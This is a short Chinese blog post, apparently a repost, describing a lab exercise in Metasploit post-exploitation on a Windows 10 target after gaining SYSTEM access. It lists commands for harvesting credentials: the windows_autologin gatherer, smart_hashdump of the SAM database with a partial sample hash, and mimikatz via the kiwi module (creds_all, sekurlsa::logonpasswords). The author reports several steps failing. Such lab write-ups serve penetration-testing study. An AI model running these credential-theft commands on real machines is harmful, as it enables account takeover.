0


MSF后渗透之获取windows登录密码

一、环境准备

1.MSF

2.windows靶机

二、实际操作

测试之前需要获取到win10的system权限

1.抓取自动登录账户密码

*前提靶机设置了自动登录

run windows/gather/credentials/windows_autologin

出现上面提示上面,靶机没有设置自动登录

2.导出SAM数据库本地账户密码文件

*前提需要获取本机SYSTEM权限

run post/windows/gather/smart_hashdump

密码是经过哈希加密需要进行解密

可以通过https://cmd5.com/解密
用户名SIDLM哈希NTL哈希1::mb/root.....500/503.....aad3b435b51404eeaad3b435b51404ee1d6cfe0d16ae931b73c59d7e0c089

3.使用load kiwi(使用kiwi模块需要获取SYSTEM权限)

kiwi_cmd 模块可以让我们使用mimikatz的全部功能,mimikatz的命令直接在kiwi_cmd里面直接使用

终端输入 load kiwi 第一次使用需要加载

使用

creds_all //获取密码

这里我没有获取成功,还没找到原因,有大佬知道希望指点指点

kiwi_cmd sekurlsa::logonpasswords //获取密码

由于我的靶机是x64架构的所有没有获取成功


本文转载自: https://blog.csdn.net/qq_55364369/article/details/126713465
版权归原作者 小周有点懵 所有, 如有侵权,请联系我们删除。

“MSF后渗透之获取windows登录密码”的评论:

还没有评论